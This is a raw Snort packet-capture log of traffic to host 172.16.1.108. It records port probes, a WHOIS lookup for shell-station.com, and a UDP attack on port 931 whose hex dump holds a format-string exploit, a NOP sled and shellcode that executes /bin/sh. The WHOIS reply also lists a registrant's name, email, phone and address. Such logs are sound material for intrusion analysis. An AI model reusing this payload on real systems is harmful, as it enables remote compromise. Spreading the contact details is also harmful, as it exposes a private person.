Log directory = --== Initializing Snort ==-- TCPDUMP file reading mode. Reading network traffic from "snort-0315@0005.log" file. snaplen = 1514 --== Initialization Complete ==-- 03/15-04:33:29.053298 203.111.78.182:2662 -> 172.16.1.108:111 TCP TTL:45 TOS:0x0 ID:38712 IpLen:20 DgmLen:60 DF ******S* Seq: 0x61FB5E1F Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 1426277 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-08:35:55.265661 211.180.229.190:1565 -> 172.16.1.108:515 TCP TTL:47 TOS:0x0 ID:16428 IpLen:20 DgmLen:60 DF ******S* Seq: 0xFFBF4871 Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 2454197 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-12:34:07.018434 172.16.1.108:1025 -> 216.168.224.69:43 TCP TTL:63 TOS:0x0 ID:63 IpLen:20 DgmLen:60 DF ******S* Seq: 0x73088CB4 Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 75198 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-12:34:07.189410 216.168.224.69:43 -> 172.16.1.108:1025 TCP TTL:240 TOS:0x0 ID:44765 IpLen:20 DgmLen:60 ***A**S* Seq: 0xDC2B3D6C Ack: 0x73088CB5 Win: 0x2798 TcpLen: 40 TCP Options (6) => NOP NOP TS: 1214982934 75198 NOP WS: 0 MSS: 1460 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-12:34:07.190996 172.16.1.108:1025 -> 216.168.224.69:43 TCP TTL:63 TOS:0x0 ID:64 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x73088CB5 Ack: 0xDC2B3D6D Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 75216 1214982934 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-12:34:07.191009 172.16.1.108:1025 -> 216.168.224.69:43 TCP TTL:63 TOS:0x0 ID:65 IpLen:20 DgmLen:69 DF ***AP*** Seq: 0x73088CB5 Ack: 0xDC2B3D6D Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 75216 1214982934 73 68 65 6C 6C 2D 73 74 61 74 69 6F 6E 2E 63 6F shell-station.co 6D m =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-12:34:07.265038 216.168.224.69:43 -> 172.16.1.108:1025 TCP TTL:240 TOS:0x0 ID:44766 IpLen:20 DgmLen:52 ***A**** Seq: 0xDC2B3D6D Ack: 0x73088CC6 Win: 0x2787 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1214982950 75216 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-12:34:07.266220 172.16.1.108:1025 -> 216.168.224.69:43 TCP TTL:63 TOS:0x0 ID:66 IpLen:20 DgmLen:54 DF ***AP*** Seq: 0x73088CC6 Ack: 0xDC2B3D6D Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 75223 1214982950 0D 0A .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-12:34:07.347389 216.168.224.69:43 -> 172.16.1.108:1025 TCP TTL:240 TOS:0x0 ID:44767 IpLen:20 DgmLen:52 ***A**** Seq: 0xDC2B3D6D Ack: 0x73088CC8 Win: 0x2798 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1214982958 75223 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-12:34:07.458627 216.168.224.69:43 -> 172.16.1.108:1025 TCP TTL:240 TOS:0x0 ID:44768 IpLen:20 DgmLen:845 ***AP*** Seq: 0xDC2B3D6D Ack: 0x73088CC8 Win: 0x2798 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1214982958 75223 54 68 65 20 44 61 74 61 20 69 6E 20 4E 65 74 77 The Data in Netw 6F 72 6B 20 53 6F 6C 75 74 69 6F 6E 73 27 20 57 ork Solutions' W 48 4F 49 53 20 64 61 74 61 62 61 73 65 20 69 73 HOIS database is 20 70 72 6F 76 69 64 65 64 20 62 79 20 4E 65 74 provided by Net 77 6F 72 6B 0A 53 6F 6C 75 74 69 6F 6E 73 20 66 work.Solutions f 6F 72 20 69 6E 66 6F 72 6D 61 74 69 6F 6E 20 70 or information p 75 72 70 6F 73 65 73 2C 20 61 6E 64 20 74 6F 20 urposes, and to 61 73 73 69 73 74 20 70 65 72 73 6F 6E 73 20 69 assist persons i 6E 20 6F 62 74 61 69 6E 69 6E 67 0A 69 6E 66 6F n obtaining.info 72 6D 61 74 69 6F 6E 20 61 62 6F 75 74 20 6F 72 rmation about or 20 72 65 6C 61 74 65 64 20 74 6F 20 61 20 64 6F related to a do 6D 61 69 6E 20 6E 61 6D 65 20 72 65 67 69 73 74 main name regist 72 61 74 69 6F 6E 20 72 65 63 6F 72 64 2E 0A 4E ration record..N 65 74 77 6F 72 6B 20 53 6F 6C 75 74 69 6F 6E 73 etwork Solutions 20 64 6F 65 73 20 6E 6F 74 20 67 75 61 72 61 6E does not guaran 74 65 65 20 69 74 73 20 61 63 63 75 72 61 63 79 tee its accuracy 2E 20 20 42 79 20 73 75 62 6D 69 74 74 69 6E 67 . By submitting 20 61 0A 57 48 4F 49 53 20 71 75 65 72 79 2C 20 a.WHOIS query, 79 6F 75 20 61 67 72 65 65 20 74 68 61 74 20 79 you agree that y 6F 75 20 77 69 6C 6C 20 75 73 65 20 74 68 69 73 ou will use this 20 44 61 74 61 20 6F 6E 6C 79 20 66 6F 72 20 6C Data only for l 61 77 66 75 6C 0A 70 75 72 70 6F 73 65 73 20 61 awful.purposes a 6E 64 20 74 68 61 74 2C 20 75 6E 64 65 72 20 6E nd that, under n 6F 20 63 69 72 63 75 6D 73 74 61 6E 63 65 73 20 o circumstances 77 69 6C 6C 20 79 6F 75 20 75 73 65 20 74 68 69 will you use thi 73 20 44 61 74 61 20 74 6F 3A 0A 28 31 29 20 61 s Data to:.(1) a 6C 6C 6F 77 2C 20 65 6E 61 62 6C 65 2C 20 6F 72 llow, enable, or 20 6F 74 68 65 72 77 69 73 65 20 73 75 70 70 6F otherwise suppo 72 74 20 74 68 65 20 74 72 61 6E 73 6D 69 73 73 rt the transmiss 69 6F 6E 20 6F 66 20 6D 61 73 73 0A 75 6E 73 6F ion of mass.unso 6C 69 63 69 74 65 64 2C 20 63 6F 6D 6D 65 72 63 licited, commerc 69 61 6C 20 61 64 76 65 72 74 69 73 69 6E 67 20 ial advertising 6F 72 20 73 6F 6C 69 63 69 74 61 74 69 6F 6E 73 or solicitations 20 76 69 61 20 65 2D 6D 61 69 6C 0A 28 73 70 61 via e-mail.(spa 6D 29 3B 20 6F 72 20 20 28 32 29 20 65 6E 61 62 m); or (2) enab 6C 65 20 68 69 67 68 20 76 6F 6C 75 6D 65 2C 20 le high volume, 61 75 74 6F 6D 61 74 65 64 2C 20 65 6C 65 63 74 automated, elect 72 6F 6E 69 63 20 70 72 6F 63 65 73 73 65 73 0A ronic processes. 74 68 61 74 20 61 70 70 6C 79 20 74 6F 20 4E 65 that apply to Ne 74 77 6F 72 6B 20 53 6F 6C 75 74 69 6F 6E 73 20 twork Solutions 28 6F 72 20 69 74 73 20 73 79 73 74 65 6D 73 29 (or its systems) 2E 20 20 4E 65 74 77 6F 72 6B 20 53 6F 6C 75 74 . Network Solut 69 6F 6E 73 0A 72 65 73 65 72 76 65 73 20 74 68 ions.reserves th 65 20 72 69 67 68 74 20 74 6F 20 6D 6F 64 69 66 e right to modif 79 20 74 68 65 73 65 20 74 65 72 6D 73 20 61 74 y these terms at 20 61 6E 79 20 74 69 6D 65 2E 20 20 42 79 20 73 any time. By s 75 62 6D 69 74 74 69 6E 67 0A 74 68 69 73 20 71 ubmitting.this q 75 65 72 79 2C 20 79 6F 75 20 61 67 72 65 65 20 uery, you agree 74 6F 20 61 62 69 64 65 20 62 79 20 74 68 69 73 to abide by this 20 70 6F 6C 69 63 79 2E 0A policy.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-12:34:07.461256 172.16.1.108:1025 -> 216.168.224.69:43 TCP TTL:63 TOS:0x0 ID:67 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x73088CC8 Ack: 0xDC2B4086 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 75243 1214982958 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-12:34:07.927177 216.168.224.69:43 -> 172.16.1.108:1025 TCP TTL:240 TOS:0x0 ID:44769 IpLen:20 DgmLen:1469 ***AP*** Seq: 0xDC2B4086 Ack: 0x73088CC8 Win: 0x2798 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1214983006 75243 41 63 63 65 73 73 20 74 6F 20 65 4E 6F 6D 27 73 Access to eNom's 20 57 68 6F 69 73 20 69 6E 66 6F 72 6D 61 74 69 Whois informati 6F 6E 20 69 73 20 66 6F 72 20 69 6E 66 6F 72 6D on is for inform 61 74 69 6F 6E 61 6C 20 0A 70 75 72 70 6F 73 65 ational .purpose 73 20 6F 6E 6C 79 2E 20 65 4E 6F 6D 20 6D 61 6B s only. eNom mak 65 73 20 74 68 69 73 20 69 6E 66 6F 72 6D 61 74 es this informat 69 6F 6E 20 61 76 61 69 6C 61 62 6C 65 20 22 61 ion available "a 73 20 69 73 2C 22 20 0A 61 6E 64 20 64 6F 65 73 s is," .and does 20 6E 6F 74 20 67 75 61 72 61 6E 74 65 65 20 69 not guarantee i 74 73 20 61 63 63 75 72 61 63 79 2E 20 54 68 65 ts accuracy. The 20 63 6F 6D 70 69 6C 61 74 69 6F 6E 2C 20 72 65 compilation, re 70 61 63 6B 61 67 69 6E 67 2C 20 0A 64 69 73 73 packaging, .diss 65 6D 69 6E 61 74 69 6F 6E 20 6F 72 20 6F 74 68 emination or oth 65 72 20 75 73 65 20 6F 66 20 65 4E 6F 6D 27 73 er use of eNom's 20 57 68 6F 69 73 20 69 6E 66 6F 72 6D 61 74 69 Whois informati 6F 6E 20 69 6E 20 69 74 73 20 0A 65 6E 74 69 72 on in its .entir 65 74 79 2C 20 6F 72 20 61 20 73 75 62 73 74 61 ety, or a substa 6E 74 69 61 6C 20 70 6F 72 74 69 6F 6E 20 74 68 ntial portion th 65 72 65 6F 66 2C 20 69 73 20 65 78 70 72 65 73 ereof, is expres 73 6C 79 20 70 72 6F 68 69 62 69 74 65 64 20 0A sly prohibited . 77 69 74 68 6F 75 74 20 74 68 65 20 70 72 69 6F without the prio 72 20 77 72 69 74 74 65 6E 20 63 6F 6E 73 65 6E r written consen 74 20 6F 66 20 65 4E 6F 6D 2C 20 49 6E 63 2E 20 t of eNom, Inc. 42 79 20 61 63 63 65 73 73 69 6E 67 20 61 6E 64 By accessing and 20 0A 75 73 69 6E 67 20 6F 75 72 20 57 68 6F 69 .using our Whoi 73 20 69 6E 66 6F 72 6D 61 74 69 6F 6E 2C 20 79 s information, y 6F 75 20 61 67 72 65 65 20 74 6F 20 74 68 65 73 ou agree to thes 65 20 74 65 72 6D 73 2E 0A 0A 0D 0A 44 6F 6D 61 e terms.....Doma 69 6E 20 6E 61 6D 65 3A 20 73 68 65 6C 6C 2D 73 in name: shell-s 74 61 74 69 6F 6E 2E 63 6F 6D 0D 0A 0D 0A 52 65 tation.com....Re 67 69 73 74 72 61 6E 74 3A 0D 0A 20 20 20 53 68 gistrant:.. Sh 65 6C 6C 20 53 74 61 74 69 6F 6E 0D 0A 20 20 20 ell Station.. 44 75 73 74 69 6E 20 50 20 20 20 28 44 75 73 74 Dustin P (Dust 69 66 65 72 40 68 6F 74 6D 61 69 6C 2E 63 6F 6D ifer@hotmail.com 29 0D 0A 20 20 20 36 32 33 2D 35 38 31 2D 32 30 ).. 623-581-20 32 34 0D 0A 20 20 20 46 41 58 3A 20 36 32 33 2D 24.. FAX: 623- 35 38 31 2D 32 30 32 34 0D 0A 20 20 20 39 30 37 581-2024.. 907 20 57 2E 20 52 6F 73 73 20 41 76 65 0D 0A 20 20 W. Ross Ave.. 20 50 68 6F 65 6E 69 78 2C 20 41 5A 20 38 35 30 Phoenix, AZ 850 32 37 0D 0A 20 20 20 55 6E 69 74 65 64 20 53 74 27.. United St 61 74 65 73 0D 0A 0D 0A 0D 0A 41 64 6D 69 6E 69 ates......Admini 73 74 72 61 74 69 76 65 3A 0D 0A 20 20 20 53 68 strative:.. Sh 65 6C 6C 20 53 74 61 74 69 6F 6E 0D 0A 20 20 20 ell Station.. 44 75 73 74 69 6E 20 50 20 20 20 28 44 75 73 74 Dustin P (Dust 69 66 65 72 40 68 6F 74 6D 61 69 6C 2E 63 6F 6D ifer@hotmail.com 29 0D 0A 20 20 20 36 32 33 2D 35 38 31 2D 32 30 ).. 623-581-20 32 34 0D 0A 20 20 20 46 41 58 3A 20 36 32 33 2D 24.. FAX: 623- 35 38 31 2D 32 30 32 34 0D 0A 20 20 20 39 30 37 581-2024.. 907 20 57 2E 20 52 6F 73 73 20 41 76 65 0D 0A 20 20 W. Ross Ave.. 20 50 68 6F 65 6E 69 78 2C 20 41 5A 20 38 35 30 Phoenix, AZ 850 32 37 0D 0A 20 20 20 55 6E 69 74 65 64 20 53 74 27.. United St 61 74 65 73 0D 0A 0D 0A 0D 0A 42 69 6C 6C 69 6E ates......Billin 67 3A 0D 0A 20 20 20 53 68 65 6C 6C 20 53 74 61 g:.. Shell Sta 74 69 6F 6E 0D 0A 20 20 20 44 75 73 74 69 6E 20 tion.. Dustin 50 20 20 20 28 44 75 73 74 69 66 65 72 40 68 6F P (Dustifer@ho 74 6D 61 69 6C 2E 63 6F 6D 29 0D 0A 20 20 20 36 tmail.com).. 6 32 33 2D 35 38 31 2D 32 30 32 34 0D 0A 20 20 20 23-581-2024.. 46 41 58 3A 20 36 32 33 2D 35 38 31 2D 32 30 32 FAX: 623-581-202 34 0D 0A 20 20 20 39 30 37 20 57 2E 20 52 6F 73 4.. 907 W. Ros 73 20 41 76 65 0D 0A 20 20 20 50 68 6F 65 6E 69 s Ave.. Phoeni 78 2C 20 41 5A 20 38 35 30 32 37 0D 0A 20 20 20 x, AZ 85027.. 55 6E 69 74 65 64 20 53 74 61 74 65 73 0D 0A 0D United States... 0A 0D 0A 54 65 63 68 6E 69 63 61 6C 3A 0D 0A 20 ...Technical:.. 20 20 53 68 65 6C 6C 20 53 74 61 74 69 6F 6E 0D Shell Station. 0A 20 20 20 44 75 73 74 69 6E 20 50 20 20 20 28 . Dustin P ( 44 75 73 74 69 66 65 72 40 68 6F 74 6D 61 69 6C Dustifer@hotmail 2E 63 6F 6D 29 0D 0A 20 20 20 36 32 33 2D 35 38 .com).. 623-58 31 2D 32 30 32 34 0D 0A 20 20 20 46 41 58 3A 20 1-2024.. FAX: 36 32 33 2D 35 38 31 2D 32 30 32 34 0D 0A 20 20 623-581-2024.. 20 39 30 37 20 57 2E 20 52 6F 73 73 20 41 76 65 907 W. Ross Ave 0D 0A 20 20 20 50 68 6F 65 6E 69 78 2C 20 41 5A .. Phoenix, AZ 20 38 35 30 32 37 0D 0A 20 20 20 55 6E 69 74 65 85027.. Unite 64 20 53 74 61 74 65 73 0D 0A 0D 0A 0D 0A 0D 0A d States........ 44 4F 4D 41 49 4E 20 45 58 50 49 52 45 53 20 3A DOMAIN EXPIRES : 20 32 30 30 31 2D 31 32 2D 30 32 20 31 32 3A 35 2001-12-02 12:5 33 3A 32 37 0D 0A 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 3:27....-------- 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ---------------- 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ---------------- 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ---------------- 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ---------------- 2D 2D 2D 2D 2D 2D 2D 2D 0A 54 68 69 73 20 69 6E --------.This in 66 6F 72 6D 61 74 69 6F 6E 20 77 61 73 20 70 72 formation was pr 6F 76 69 64 65 64 20 62 79 20 45 6E 6F 6D 2C 20 ovided by Enom, 49 6E 63 2E 20 61 6E 20 61 63 63 72 65 64 69 74 Inc. an accredit 65 64 20 49 43 41 4E 4E 20 72 65 67 69 73 74 72 ed ICANN registr 61 72 2E 0A 68 74 74 70 3A 2F 2F 77 77 77 2E 65 ar..http://www.e 6E 6F 6D 2E 63 6F 6D 0A 52 65 67 69 73 74 65 72 nom.com.Register 20 79 6F 75 72 20 64 6F 6D 61 69 6E 20 6E 61 6D your domain nam 65 20 74 6F 64 61 79 21 0A e today!. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-12:34:08.319433 172.16.1.108:1025 -> 216.168.224.69:43 TCP TTL:63 TOS:0x0 ID:68 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x73088CC8 Ack: 0xDC2B460F Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 75329 1214983006 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-12:34:08.413514 216.168.224.69:43 -> 172.16.1.108:1025 TCP TTL:240 TOS:0x0 ID:44770 IpLen:20 DgmLen:275 ***AP**F Seq: 0xDC2B460F Ack: 0x73088CC8 Win: 0x2798 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1214983063 75329 54 68 65 20 70 72 65 76 69 6F 75 73 20 69 6E 66 The previous inf 6F 72 6D 61 74 69 6F 6E 20 68 61 73 20 62 65 65 ormation has bee 6E 20 6F 62 74 61 69 6E 65 64 20 65 69 74 68 65 n obtained eithe 72 20 64 69 72 65 63 74 6C 79 20 66 72 6F 6D 20 r directly from 74 68 65 0A 72 65 67 69 73 74 72 61 6E 74 20 6F the.registrant o 72 20 61 20 72 65 67 69 73 74 72 61 72 20 6F 66 r a registrar of 20 74 68 65 20 64 6F 6D 61 69 6E 20 6E 61 6D 65 the domain name 20 6F 74 68 65 72 20 74 68 61 6E 20 4E 65 74 77 other than Netw 6F 72 6B 20 53 6F 6C 75 74 69 6F 6E 73 2E 0A 4E ork Solutions..N 65 74 77 6F 72 6B 20 53 6F 6C 75 74 69 6F 6E 73 etwork Solutions 2C 20 74 68 65 72 65 66 6F 72 65 2C 20 64 6F 65 , therefore, doe 73 20 6E 6F 74 20 67 75 61 72 61 6E 74 65 65 20 s not guarantee 69 74 73 20 61 63 63 75 72 61 63 79 20 6F 72 0A its accuracy or. 63 6F 6D 70 6C 65 74 65 6E 65 73 73 2E 0A 0A completeness... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-12:34:08.415094 172.16.1.108:1025 -> 216.168.224.69:43 TCP TTL:63 TOS:0x0 ID:69 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x73088CC8 Ack: 0xDC2B46EF Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 75338 1214983063 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-12:34:08.415958 172.16.1.108:1025 -> 216.168.224.69:43 TCP TTL:63 TOS:0x0 ID:70 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x73088CC8 Ack: 0xDC2B46EF Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 75338 1214983063 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-12:34:08.493006 216.168.224.69:43 -> 172.16.1.108:1025 TCP TTL:240 TOS:0x0 ID:44771 IpLen:20 DgmLen:52 ***A**** Seq: 0xDC2B46EF Ack: 0x73088CC9 Win: 0x2798 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1214983073 75338 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:21:23.874409 211.185.125.124:3500 -> 172.16.1.108:111 TCP TTL:43 TOS:0x0 ID:28761 IpLen:20 DgmLen:60 DF ******S* Seq: 0x9B6338C4 Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 23678607 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:21:23.881889 172.16.1.108:111 -> 211.185.125.124:3500 TCP TTL:63 TOS:0x0 ID:72 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0x5820ADCF Ack: 0x9B6338C5 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 2878772 23678607 NOP TCP Options => WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:21:24.107053 211.185.125.124:3500 -> 172.16.1.108:111 TCP TTL:43 TOS:0x0 ID:29726 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23678634 2878772 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:21:24.995382 211.185.125.124:790 -> 172.16.1.108:111 UDP TTL:43 TOS:0x0 ID:29784 IpLen:20 DgmLen:84 Len: 64 41 26 95 DA 00 00 00 00 00 00 00 02 00 01 86 A0 A&.............. 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................ 00 00 00 11 00 00 00 00 ........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:21:25.042649 172.16.1.108:111 -> 211.185.125.124:790 UDP TTL:63 TOS:0x0 ID:73 IpLen:20 DgmLen:56 Len: 36 41 26 95 DA 00 00 00 01 00 00 00 00 00 00 00 00 A&.............. 00 00 00 00 00 00 00 00 00 00 03 A3 ............ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:21:25.326967 211.185.125.124:791 -> 172.16.1.108:931 UDP TTL:43 TOS:0x0 ID:29787 IpLen:20 DgmLen:1104 Len: 1084 1A CF 13 BC 00 00 00 00 00 00 00 02 00 01 86 B8 ................ 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ............... 3A B1 5E E5 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :.^.....localhos 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t............... 00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................ 18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF ................ 1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25 ............%8x% 38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8 78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31 x%8x%8x%236x%n%1 33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78 37x%n%10x%n%192x 25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90 %n.............. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1. EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A... FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A. 99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A.. 66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?..... 3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin. 46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V 10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N............. FF FF FF 00 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:21:27.324233 211.185.125.124:791 -> 172.16.1.108:931 UDP TTL:43 TOS:0x0 ID:30705 IpLen:20 DgmLen:1104 Len: 1084 1A CF 13 BC 00 00 00 00 00 00 00 02 00 01 86 B8 ................ 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ............... 3A B1 5E E5 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :.^.....localhos 74 00 00 00 00 00 00 00 00 00 00 00 